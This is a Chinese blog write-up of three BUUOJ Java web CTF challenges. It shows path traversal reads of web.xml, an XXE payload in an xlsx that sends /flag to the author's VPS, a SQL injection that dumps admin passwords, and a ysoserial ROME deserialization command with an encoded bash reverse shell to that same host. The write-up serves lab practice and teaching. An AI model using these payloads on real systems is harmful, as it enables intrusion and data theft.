Javaweb 的一些题目复现

·
CTFWP no tag March 26, 2021

前言

BUUOJ,一些关于java的题目复现(持续更新中)

[RoarCTF 2019]Easy Java

有任意文件读取,读取WEB-INF/web.xml

得到web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    <welcome-file-list>
        <welcome-file>Index</welcome-file>
    </welcome-file-list>

    <servlet>
        <servlet-name>IndexController</servlet-name>
        <servlet-class>com.wm.ctf.IndexController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>IndexController</servlet-name>
        <url-pattern>/Index</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>LoginController</servlet-name>
        <servlet-class>com.wm.ctf.LoginController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>LoginController</servlet-name>
        <url-pattern>/Login</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>DownloadController</servlet-name>
        <servlet-class>com.wm.ctf.DownloadController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>DownloadController</servlet-name>
        <url-pattern>/Download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>FlagController</servlet-name>
        <servlet-class>com.wm.ctf.FlagController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>FlagController</servlet-name>
        <url-pattern>/Flag</url-pattern>
    </servlet-mapping>

</web-app>

发现有Flag路由,根据这个读一下FlagController.class

读到之后在线反编译一下

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet(
   name = "FlagController"
)
public class FlagController extends HttpServlet {

   String flag = "ZmxhZ3s4NzBlMDVjMi03NGUwLTQwNjMtOGFkNy0xNmQ1MTUyMWVlNGR9Cg==";


   protected void doGet(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
      PrintWriter var3 = var2.getWriter();
      var3.print("<h1>Flag is nearby ~ Come on! ! !</h1>");
   }
}

发现了flag

[网鼎杯 2020 青龙组]filejava

进去发现下载那里有任意文件读取

/DownloadServlet?filename=../../../../WEB-INF/web.xml

读取web.xml文件

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/DownloadServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>ListFileServlet</servlet-name>
        <servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>ListFileServlet</servlet-name>
        <url-pattern>/ListFileServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>UploadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>UploadServlet</servlet-name>
        <url-pattern>/UploadServlet</url-pattern>
    </servlet-mapping>
</web-app>

一共有三个Servlet,把他们读出来反编译 JD-GUI

主要看upload.java中

if(filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
    try {
        Workbook saveFilename = WorkbookFactory.create(in);
        Sheet realSavePath = saveFilename.getSheetAt(0);
        System.out.println(realSavePath.getFirstRowNum());
    } catch (InvalidFormatException var20) {
        System.err.println("poi-ooxml-3.10 has something wrong");
        var20.printStackTrace();
    }
}

这里说了poi-ooxml-3.10而这个版本刚好有一个XXE漏洞

详细参考https://xz.aliyun.com/t/6996#toc-3

如果上传的是xlsx,且开头为excel-,那么才会触发漏洞。

我们自己新建一个xlsx,用压缩文件打开,修改[Content_Types].xml

image.png

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY[
<!ENTITY % remote SYSTEM "http://47.97.123.81/xml.dtd">
%remote;%int;%send;]>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

然后自己vps上写xml.dtd

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://47.97.123.81:11452?p=%file;'>">

然后监听,并上传,flag就弹回来了

image.png

[网鼎杯 2020 朱雀组]Think Java

直接给了class文件,拖入JD-GUI审计

image.png

扫描得到swagger-ui.html

里面有三个接口

image.png

从功能来看,一个是查询数据库功能,一个是登录功能,还有一个current其实是反序列化传入的数据

要登录那肯定要通过SQL注入注处管理员密码

看下源码,这里有明显的SQL注入,且迷人数据库为myapp可以先查一下发现确实可以image.png

jdbc:mysql://mysqldbserver:3306/myapp#' union select 1#
会被解析成
jdbc:mysql://mysqldbserver:3306/myapp

再带入sql语句
Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = '#' union select 1#' and table_name='" + TableName + "'
第一个#被单引号包裹。成了普通的#字符。第二个#注释掉了后面的语句。造成sql注入

所以就可以myapp#' union select pwd from user#;

image.png

拿到账号密码,拿去登录

{"username":"admin","password":"admin@Rrrr_ctf_asde"}

image.png

登陆成功后data是一串java反序列化的东西,Bearer token

把这串数据填入current内时,会显示操作成功,说明这个接口是用来反序列化的。那我们自己构造一个序列化字符串。

这串数据需要先base64,然后转成16进制。

#此处使用python2
import base64
a = "rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu"
b = base64.b64decode(a).encode('hex')
print(b)

下方的特征可以作为序列化的标志参考:

一段数据以rO0AB开头,你基本可以确定这串就是JAVA序列化base64加密的数据。

或者如果以aced开头,那么他就是这一段java序列化的16进制。

可以用yso生成payload

https://github.com/frohoff/ysoserial

java -jar ysoserial-master-d367e379d9-1.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ny4xMjMuODEvMTE0NTEgMD4mMQ==}|{base64,-d}|{bash,-i}" |base64

直接弹shel出来

感觉java弹shell还是这样好用一点,nc,curl都不行。

image.png

  • NepCTF 欢乐个人赛
  • 安恒月赛DASCTF三月娱乐赛
取消回复
说点什么?

© 2023 Yang_99的小窝. Using Typecho & Moricolor.